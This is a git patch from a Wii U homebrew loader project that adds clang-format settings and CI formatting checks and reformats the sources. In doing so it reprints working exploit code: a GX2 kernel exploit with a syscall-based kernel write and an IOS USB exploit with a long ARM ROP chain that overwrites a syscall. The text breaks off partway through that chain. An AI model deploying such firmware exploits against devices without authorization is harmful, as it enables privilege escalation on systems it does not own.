From de4405ecf9b525c460ab74acb348f91694e93e0c Mon Sep 17 00:00:00 2001 From: Maschell Date: Sat, 5 Mar 2022 17:00:58 +0100 Subject: [PATCH] Format via clang-format --- .clang-format | 67 +++ .github/workflows/ci.yml | 10 +- .github/workflows/pr.yml | 8 + README.md | 5 + source/ElfUtils.c | 35 +- source/elf_abi.h | 1 + source/gx2sploit.cpp | 146 +++--- source/gx2sploit.h | 12 +- source/ios_exploit.c | 502 ++++++++++----------- source/ios_kernel/source/elf_abi.h | 1 + source/ios_kernel/source/elf_patcher.c | 6 +- source/ios_kernel/source/elf_patcher.h | 8 +- source/ios_kernel/source/instant_patches.c | 12 +- source/ios_kernel/source/kernel_patches.c | 7 +- source/ios_kernel/source/main.c | 10 +- source/ios_kernel/source/utils.c | 2 +- source/ios_kernel/source/utils.h | 29 +- source/ios_usb/source/main.c | 3 +- source/main.cpp | 32 +- source/utils/logger.h | 10 +- 20 files changed, 502 insertions(+), 404 deletions(-) create mode 100644 .clang-format diff --git a/.clang-format b/.clang-format new file mode 100644 index 0000000..56cc685 --- /dev/null +++ b/.clang-format @@ -0,0 +1,67 @@ +# Generated from CLion C/C++ Code Style settings +BasedOnStyle: LLVM +AccessModifierOffset: -4 +AlignAfterOpenBracket: Align +AlignConsecutiveAssignments: Consecutive +AlignConsecutiveMacros: AcrossEmptyLinesAndComments +AlignOperands: Align +AllowAllArgumentsOnNextLine: false +AllowAllConstructorInitializersOnNextLine: false +AllowAllParametersOfDeclarationOnNextLine: false +AllowShortBlocksOnASingleLine: Always +AllowShortCaseLabelsOnASingleLine: false +AllowShortFunctionsOnASingleLine: All +AllowShortIfStatementsOnASingleLine: Always +AllowShortLambdasOnASingleLine: All +AllowShortLoopsOnASingleLine: true +AlwaysBreakAfterReturnType: None +AlwaysBreakTemplateDeclarations: Yes +BreakBeforeBraces: Custom +BraceWrapping: + AfterCaseLabel: false + AfterClass: false + AfterControlStatement: Never + AfterEnum: false + AfterFunction: false + AfterNamespace: false + AfterUnion: false + BeforeCatch: false + BeforeElse: false + IndentBraces: false + SplitEmptyFunction: false + SplitEmptyRecord: true +BreakBeforeBinaryOperators: None +BreakBeforeTernaryOperators: true +BreakConstructorInitializers: BeforeColon +BreakInheritanceList: BeforeColon +ColumnLimit: 0 +CompactNamespaces: false +ContinuationIndentWidth: 8 +IndentCaseLabels: true +IndentPPDirectives: None +IndentWidth: 4 +KeepEmptyLinesAtTheStartOfBlocks: true +MaxEmptyLinesToKeep: 2 +NamespaceIndentation: All +ObjCSpaceAfterProperty: false +ObjCSpaceBeforeProtocolList: true +PointerAlignment: Right +ReflowComments: false +SpaceAfterCStyleCast: true +SpaceAfterLogicalNot: false +SpaceAfterTemplateKeyword: false +SpaceBeforeAssignmentOperators: true +SpaceBeforeCpp11BracedList: false +SpaceBeforeCtorInitializerColon: true +SpaceBeforeInheritanceColon: true +SpaceBeforeParens: ControlStatements +SpaceBeforeRangeBasedForLoopColon: true +SpaceInEmptyParentheses: false +SpacesBeforeTrailingComments: 1 +SpacesInAngles: false +SpacesInCStyleCastParentheses: false +SpacesInContainerLiterals: false +SpacesInParentheses: false +SpacesInSquareBrackets: false +TabWidth: 4 +UseTab: Never diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 689b413..2938346 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -6,8 +6,16 @@ on: - master jobs: + clang-format: + runs-on: ubuntu-18.04 + steps: + - uses: actions/checkout@v2 + - name: clang-format + run: | + docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source build-binary: runs-on: ubuntu-18.04 + needs: clang-format steps: - uses: actions/checkout@v2 - name: build binary @@ -26,7 +34,7 @@ jobs: id: get_repository_name run: | echo REPOSITORY_NAME=$(echo "$GITHUB_REPOSITORY" | awk -F / '{print $2}' | sed -e "s/:refs//") >> $GITHUB_ENV - echo DATETIME=$(echo $(date '+%Y%m%d-%H%M%S')) >> $GITHUB_ENV + echo DATETIME=$(echo $(date '+%Y%m%d-%H%M%S')) >> $GITHUB_ENV - uses: actions/download-artifact@master with: name: binary diff --git a/.github/workflows/pr.yml b/.github/workflows/pr.yml index f907f7e..7464b72 100644 --- a/.github/workflows/pr.yml +++ b/.github/workflows/pr.yml @@ -3,8 +3,16 @@ name: CI-PR on: [pull_request] jobs: + clang-format: + runs-on: ubuntu-18.04 + steps: + - uses: actions/checkout@v2 + - name: clang-format + run: | + docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source build-binary: runs-on: ubuntu-18.04 + needs: clang-format steps: - uses: actions/checkout@v2 - name: build binary diff --git a/README.md b/README.md index 948fdbc..8066176 100644 --- a/README.md +++ b/README.md @@ -63,6 +63,11 @@ docker run -it --rm -v ${PWD}:/project payloadfromrpx-builder make docker run -it --rm -v ${PWD}:/project payloadfromrpx-builder make clean ``` + +## Format the code via docker + +`docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source -i` + ## Credits - orboditilt - Maschell diff --git a/source/ElfUtils.c b/source/ElfUtils.c index 51b0851..9dce42d 100644 --- a/source/ElfUtils.c +++ b/source/ElfUtils.c @@ -1,19 +1,19 @@ #include #include -#include #include +#include #include -#include +#include #include #include -#include +#include #include "elf_abi.h" int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) { char path[256]; - int result = 0; + int result = 0; char *sdRootPath = ""; if (!WHBMountSdCard()) { DEBUG_FUNCTION_LINE("Failed to mount SD Card..."); @@ -33,7 +33,7 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si goto exit; } - exit: +exit: WHBUnmountSdCard(); return result; } @@ -41,7 +41,7 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si static void InstallMain(void *data_elf); uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativePath) { - char *elf_data = NULL; + char *elf_data = NULL; uint32_t fileSize = 0; if (LoadFileToMem(relativePath, &elf_data, &fileSize) != 0) { return 0; @@ -61,10 +61,7 @@ uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativ static unsigned int get_section(unsigned char *data, const char *name, unsigned int *size, unsigned int *addr, int fail_on_not_found) { Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data; - if (!data - || !IS_ELF (*ehdr) - || (ehdr->e_type != ET_EXEC) - || (ehdr->e_machine != EM_PPC)) { + if (!data || !IS_ELF(*ehdr) || (ehdr->e_type != ET_EXEC) || (ehdr->e_machine != EM_PPC)) { OSFatal("Invalid elf file"); } @@ -96,9 +93,9 @@ static unsigned int get_section(unsigned char *data, const char *name, unsigned static void InstallMain(void *data_elf) { // get .text section unsigned int main_text_addr = 0; - unsigned int main_text_len = 0; + unsigned int main_text_len = 0; unsigned int section_offset = get_section(data_elf, ".text", &main_text_len, &main_text_addr, 1); - unsigned char *main_text = data_elf + section_offset; + unsigned char *main_text = data_elf + section_offset; /* Copy main .text to memory */ if (section_offset > 0) { DEBUG_FUNCTION_LINE("Copy section to %08X from %08X (size: %d)", main_text_addr, main_text, main_text_len); @@ -110,21 +107,20 @@ static void InstallMain(void *data_elf) { // get the .rodata section unsigned int main_rodata_addr = 0; - unsigned int main_rodata_len = 0; - section_offset = get_section(data_elf, ".rodata", &main_rodata_len, &main_rodata_addr, 0); + unsigned int main_rodata_len = 0; + section_offset = get_section(data_elf, ".rodata", &main_rodata_len, &main_rodata_addr, 0); if (section_offset > 0) { unsigned char *main_rodata = data_elf + section_offset; /* Copy main rodata to memory */ memcpy((void *) (main_rodata_addr), (void *) main_rodata, main_rodata_len); DCFlushRange((void *) main_rodata_addr, main_rodata_len); ICInvalidateRange((void *) main_rodata_addr, main_rodata_len); - } // get the .data section unsigned int main_data_addr = 0; - unsigned int main_data_len = 0; - section_offset = get_section(data_elf, ".data", &main_data_len, &main_data_addr, 0); + unsigned int main_data_len = 0; + section_offset = get_section(data_elf, ".data", &main_data_len, &main_data_addr, 0); if (section_offset > 0) { unsigned char *main_data = data_elf + section_offset; /* Copy main data to memory */ @@ -135,8 +131,8 @@ static void InstallMain(void *data_elf) { // get the .bss section unsigned int main_bss_addr = 0; - unsigned int main_bss_len = 0; - section_offset = get_section(data_elf, ".bss", &main_bss_len, &main_bss_addr, 0); + unsigned int main_bss_len = 0; + section_offset = get_section(data_elf, ".bss", &main_bss_len, &main_bss_addr, 0); if (section_offset > 0) { unsigned char *main_bss = data_elf + section_offset; /* Copy main data to memory */ @@ -144,5 +140,4 @@ static void InstallMain(void *data_elf) { DCFlushRange((void *) main_bss_addr, main_bss_len); ICInvalidateRange((void *) main_bss_addr, main_bss_len); } - } diff --git a/source/elf_abi.h b/source/elf_abi.h index 4d9c796..aa119af 100644 --- a/source/elf_abi.h +++ b/source/elf_abi.h @@ -1,3 +1,4 @@ +// clang-format off /* * Copyright (c) 1995, 1996, 2001, 2002 * Erik Theisen. All rights reserved. diff --git a/source/gx2sploit.cpp b/source/gx2sploit.cpp index df291ba..77cb57e 100644 --- a/source/gx2sploit.cpp +++ b/source/gx2sploit.cpp @@ -1,34 +1,33 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include "ElfUtils.h" #include "gx2sploit.h" +#include "ElfUtils.h" +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include -#define JIT_ADDRESS 0x01800000 +#define JIT_ADDRESS 0x01800000 -#define KERN_HEAP 0xFF200000 -#define KERN_HEAP_PHYS 0x1B800000 +#define KERN_HEAP 0xFF200000 +#define KERN_HEAP_PHYS 0x1B800000 -#define KERN_CODE_READ 0xFFF023D4 -#define KERN_CODE_WRITE 0xFFF023F4 -#define KERN_DRVPTR 0xFFEAB530 +#define KERN_CODE_READ 0xFFF023D4 +#define KERN_CODE_WRITE 0xFFF023F4 +#define KERN_DRVPTR 0xFFEAB530 -#define STARTID_OFFSET 0x08 -#define METADATA_OFFSET 0x14 -#define METADATA_SIZE 0x10 +#define STARTID_OFFSET 0x08 +#define METADATA_OFFSET 0x14 +#define METADATA_SIZE 0x10 extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len); @@ -49,24 +48,23 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star /* Chadderz's kernel write function */ void __attribute__((noinline)) kern_write(const void *addr, uint32_t value) { - asm volatile ( - "li 3,1\n" - "li 4,0\n" - "mr 5,%1\n" - "li 6,0\n" - "li 7,0\n" - "lis 8,1\n" - "mr 9,%0\n" - "mr %1,1\n" - "li 0,0x3500\n" - "sc\n" - "nop\n" - "mr 1,%1\n" - : - : "r"(addr), "r"(value) - : "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10", - "11", "12" - ); + asm volatile( + "li 3,1\n" + "li 4,0\n" + "mr 5,%1\n" + "li 6,0\n" + "li 7,0\n" + "lis 8,1\n" + "mr 9,%0\n" + "mr %1,1\n" + "li 0,0x3500\n" + "sc\n" + "nop\n" + "mr 1,%1\n" + : + : "r"(addr), "r"(value) + : "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10", + "11", "12"); } extern "C" void OSSwitchSecCodeGenMode(int); @@ -75,7 +73,7 @@ int exploitThread(int argc, char **argv) { OSDynLoad_Module gx2_handle; OSDynLoad_Acquire("gx2.rpl", &gx2_handle); - void (*pGX2SetSemaphore)(uint64_t *sem, int action); + void (*pGX2SetSemaphore)(uint64_t * sem, int action); OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void **) &pGX2SetSemaphore); uint32_t set_semaphore = ((uint32_t) pGX2SetSemaphore) + 0x2C; @@ -98,16 +96,16 @@ int exploitThread(int argc, char **argv) { /* Set the kernel heap metadata entry */ uint32_t *metadata = (uint32_t *) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE)); - metadata[0] = (uint32_t) drvhax; - metadata[1] = (uint32_t) -0x4c; - metadata[2] = (uint32_t) -1; - metadata[3] = (uint32_t) -1; + metadata[0] = (uint32_t) drvhax; + metadata[1] = (uint32_t) -0x4c; + metadata[2] = (uint32_t) -1; + metadata[3] = (uint32_t) -1; /* Find stuff */ - uint32_t gx2data[] = {0xfc2a0000}; - uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); - uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; - void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) (((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14); + uint32_t gx2data[] = {0xfc2a0000}; + uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); + uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; + void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t))(((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14); /* Modify a next ptr on the heap */ uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET; @@ -186,15 +184,23 @@ static void SCSetupIBAT4DBAT5() { // 00800000-01000000 => 30800000-31000000 (read/write, user/supervisor) unsigned int ibat4u = 0x008000FF; unsigned int ibat4l = 0x30800012; - asm volatile("mtspr 560, %0" : : "r" (ibat4u)); - asm volatile("mtspr 561, %0" : : "r" (ibat4l)); + asm volatile("mtspr 560, %0" + : + : "r"(ibat4u)); + asm volatile("mtspr 561, %0" + : + : "r"(ibat4l)); // Give our and the kernel full data access rights. // 00800000-01000000 => 30800000-31000000 (read/write, user/supervisor) unsigned int dbat5u = ibat4u; unsigned int dbat5l = ibat4l; - asm volatile("mtspr 570, %0" : : "r" (dbat5u)); - asm volatile("mtspr 571, %0" : : "r" (dbat5l)); + asm volatile("mtspr 570, %0" + : + : "r"(dbat5u)); + asm volatile("mtspr 571, %0" + : + : "r"(dbat5l)); asm volatile("eieio; isync"); } @@ -205,13 +211,13 @@ int DoKernelExploit(void) { DEBUG_FUNCTION_LINE("Running GX2Sploit"); /* Make a thread to modify the semaphore */ OSThread *thread = (OSThread *) memalign(8, 0x1000); - uint8_t *stack = (uint8_t *) memalign(0x40, 0x2000); + uint8_t *stack = (uint8_t *) memalign(0x40, 0x2000); OSSwitchSecCodeGenMode(0); memcpy((void *) 0x1800000, (void *) &SCKernelCopyData, 0x100); unsigned int setIBAT0Addr = 0x1800200; - unsigned int *curAddr = (uint32_t *) setIBAT0Addr; + unsigned int *curAddr = (uint32_t *) setIBAT0Addr; curAddr[0] = 0x7C0006AC; curAddr[1] = 0x4C00012C; @@ -241,18 +247,18 @@ int DoKernelExploit(void) { uint32_t targetAddress = 0x017FF000; KernelWrite((uint32_t) backupBuffer, (void *) 0x017FF000, 0x40); - targetBuffer[0] = 0x7c7082a6; // mfspr r3, 528 - targetBuffer[1] = 0x60630003; // ori r3, r3, 0x03 - targetBuffer[2] = 0x7c7083a6; // mtspr 528, r3 - targetBuffer[3] = 0x7c7282a6; // mfspr r3, 530 - targetBuffer[4] = 0x60630003; // ori r3, r3, 0x03 - targetBuffer[5] = 0x7c7283a6; // mtspr 530, r3 - targetBuffer[6] = 0x7c0006ac; // eieio - targetBuffer[7] = 0x4c00012c; // isync - targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h - targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l - targetBuffer[10] = 0x7c6903a6; // mtctr r3 - targetBuffer[11] = 0x4e800420; // bctr + targetBuffer[0] = 0x7c7082a6; // mfspr r3, 528 + targetBuffer[1] = 0x60630003; // ori r3, r3, 0x03 + targetBuffer[2] = 0x7c7083a6; // mtspr 528, r3 + targetBuffer[3] = 0x7c7282a6; // mfspr r3, 530 + targetBuffer[4] = 0x60630003; // ori r3, r3, 0x03 + targetBuffer[5] = 0x7c7283a6; // mtspr 530, r3 + targetBuffer[6] = 0x7c0006ac; // eieio + targetBuffer[7] = 0x4c00012c; // isync + targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h + targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l + targetBuffer[10] = 0x7c6903a6; // mtctr r3 + targetBuffer[11] = 0x4e800420; // bctr DCFlushRange(targetBuffer, sizeof(targetBuffer)); KernelWrite((uint32_t) targetAddress, (void *) targetBuffer, 0x40); diff --git a/source/gx2sploit.h b/source/gx2sploit.h index a294363..d99eb92 100644 --- a/source/gx2sploit.h +++ b/source/gx2sploit.h @@ -4,11 +4,13 @@ extern "C" { #endif -#define KERN_SYSCALL_TBL_1 0xFFE84C70 // unknown -#define KERN_SYSCALL_TBL_2 0xFFE85070 // works with games -#define KERN_SYSCALL_TBL_3 0xFFE85470 // works with loader -#define KERN_SYSCALL_TBL_4 0xFFEAAA60 // works with home menu -#define KERN_SYSCALL_TBL_5 0xFFEAAE60 // works with browser (previously KERN_SYSCALL_TBL) +#include + +#define KERN_SYSCALL_TBL_1 0xFFE84C70 // unknown +#define KERN_SYSCALL_TBL_2 0xFFE85070 // works with games +#define KERN_SYSCALL_TBL_3 0xFFE85470 // works with loader +#define KERN_SYSCALL_TBL_4 0xFFEAAA60 // works with home menu +#define KERN_SYSCALL_TBL_5 0xFFEAAE60 // works with browser (previously KERN_SYSCALL_TBL) int DoKernelExploit(void); diff --git a/source/ios_exploit.c b/source/ios_exploit.c index e98ef60..7e5463c 100644 --- a/source/ios_exploit.c +++ b/source/ios_exploit.c @@ -1,15 +1,15 @@ -#include -#include -#include -#include -#include #include "ios_exploit.h" +#include +#include +#include +#include +#include -#define CHAIN_START 0x1016AD40 -#define SOURCE (0x120000) -#define IOS_CREATETHREAD 0x1012EABC -#define ARM_CODE_BASE 0x08135000 -#define REPLACE_SYSCALL 0x081298BC +#define CHAIN_START 0x1016AD40 +#define SOURCE (0x120000) +#define IOS_CREATETHREAD 0x1012EABC +#define ARM_CODE_BASE 0x08135000 +#define REPLACE_SYSCALL 0x081298BC static void uhs_exploit_init(int uhs_handle); @@ -17,7 +17,7 @@ static int uhs_write32(int uhs_handle, int arm_addr, int val); //!------Variables used in exploit------ static int *pretend_root_hub = (int *) 0xF5003ABC; -static int *ayylmao = (int *) 0xF4500000; +static int *ayylmao = (int *) 0xF4500000; //!------------------------------------- typedef struct __attribute__((packed)) { @@ -31,266 +31,266 @@ typedef struct __attribute__((packed)) { /* ROP CHAIN STARTS HERE (0x1015BD78) */ static const int final_chain[] = { - 0x101236f3, // 0x00 POP {R1-R7,PC} - 0x0, // 0x04 arg - 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR - 0x68, // 0x0C stacksize - 0x10101638, // 0x10 - 0x0, // 0x14 - 0x0, // 0x18 - 0x0, // 0x1C - 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x30 - 0x0, // 0x34 - IOS_CREATETHREAD, // 0x38 - 0x1, // 0x3C - 0x2, // 0x40 - 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} + 0x101236f3, // 0x00 POP {R1-R7,PC} + 0x0, // 0x04 arg + 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR + 0x68, // 0x0C stacksize + 0x10101638, // 0x10 + 0x0, // 0x14 + 0x0, // 0x18 + 0x0, // 0x1C + 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x30 + 0x0, // 0x34 + IOS_CREATETHREAD, // 0x38 + 0x1, // 0x3C + 0x2, // 0x40 + 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE92D4010, // 0x4C value: PUSH {R4,LR} - 0x0, // 0x50 - 0x10123a8b, // 0x54 POP {R3,R4,PC} - 0x1, // 0x58 R3 must be 1 for the arbitrary write - 0x0, // 0x5C - 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x64 - 0x0, // 0x68 - 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) - 0x0, // 0x70 - 0x0, // 0x74 - 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} + 0xE92D4010, // 0x4C value: PUSH {R4,LR} + 0x0, // 0x50 + 0x10123a8b, // 0x54 POP {R3,R4,PC} + 0x1, // 0x58 R3 must be 1 for the arbitrary write + 0x0, // 0x5C + 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x64 + 0x0, // 0x68 + 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) + 0x0, // 0x70 + 0x0, // 0x74 + 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A04000, // 0x80 value: MOV R4, R0 - 0x0, // 0x84 - 0x10123a8b, // 0x88 POP {R3,R4,PC} - 0x1, // 0x8C R3 must be 1 for the arbitrary write - 0x0, // 0x90 - 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x98 - 0x0, // 0x9C - 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) - 0x0, // 0xA4 - 0x0, // 0xA8 - 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} + 0xE1A04000, // 0x80 value: MOV R4, R0 + 0x0, // 0x84 + 0x10123a8b, // 0x88 POP {R3,R4,PC} + 0x1, // 0x8C R3 must be 1 for the arbitrary write + 0x0, // 0x90 + 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x98 + 0x0, // 0x9C + 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) + 0x0, // 0xA4 + 0x0, // 0xA8 + 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF - 0x0, // 0xB8 - 0x10123a8b, // 0xBC POP {R3,R4,PC} - 0x1, // 0xC0 R3 must be 1 for the arbitrary write - 0x0, // 0xC4 - 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0xCC - 0x0, // 0xD0 - 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) - 0x0, // 0xD8 - 0x0, // 0xDC - 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} + 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF + 0x0, // 0xB8 + 0x10123a8b, // 0xBC POP {R3,R4,PC} + 0x1, // 0xC0 R3 must be 1 for the arbitrary write + 0x0, // 0xC4 + 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0xCC + 0x0, // 0xD0 + 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) + 0x0, // 0xD8 + 0x0, // 0xDC + 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) - 0x0, // 0xEC - 0x10123a8b, // 0xF0 POP {R3,R4,PC} - 0x1, // 0xF4 R3 must be 1 for the arbitrary write - 0x0, // 0xF8 - 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x100 - 0x0, // 0x104 - 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) - 0x0, // 0x10C - 0x0, // 0x110 - 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} + 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) + 0x0, // 0xEC + 0x10123a8b, // 0xF0 POP {R3,R4,PC} + 0x1, // 0xF4 R3 must be 1 for the arbitrary write + 0x0, // 0xF8 + 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x100 + 0x0, // 0x104 + 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) + 0x0, // 0x10C + 0x0, // 0x110 + 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A00004, // 0x11C value: MOV R0, R4 - 0x0, // 0x120 - 0x10123a8b, // 0x124 POP {R3,R4,PC} - 0x1, // 0x128 R3 must be 1 for the arbitrary write - 0x0, // 0x12C - 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x134 - 0x0, // 0x138 - 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) - 0x0, // 0x140 - 0x0, // 0x144 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xE1A00004, // 0x11C value: MOV R0, R4 + 0x0, // 0x120 + 0x10123a8b, // 0x124 POP {R3,R4,PC} + 0x1, // 0x128 R3 must be 1 for the arbitrary write + 0x0, // 0x12C + 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x134 + 0x0, // 0x138 + 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) + 0x0, // 0x140 + 0x0, // 0x144 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x00000000, // 0x150 value: NOP - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0x00000000, // 0x150 value: NOP + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 